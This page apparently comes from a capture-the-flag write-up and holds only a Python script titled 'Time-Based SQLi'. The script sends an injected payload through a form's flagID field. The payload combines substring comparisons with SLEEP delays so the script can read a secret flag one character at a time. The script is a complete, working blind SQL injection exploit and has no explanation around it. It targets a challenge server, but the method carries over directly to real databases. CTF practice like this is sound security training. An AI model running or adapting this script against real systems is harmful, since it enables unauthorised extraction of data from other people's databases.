Time-Based SQLi

from requests import get,post,Session
from string import printable
from time import time
url = "http://challenges.unitedctf.ca:18000/challenge4.php"

flag = [''] * 100
char_found = 0
no_char_found = 0
with Session() as s:
  while True:
    for char in printable:
      data = {}
      data["flagID"] = f"1' and if(substring(flag,{char_found + 1},1) = '{char}' COLLATE utf8mb4_bin,sleep(0.5),'no')#"
      before = time()
      s.post(url,data=data)
      after = time()
      if after - before > 0.45:
        flag[char_found] = char
        char_found += 1
        break
      print(''.join(flag)+char,end="\r")
    if len(''.join(flag)) == 76:
      print(''.join(flag))
      break

Previous2020 NextBlind SQLi

Last updated 5 years ago

Was this helpful?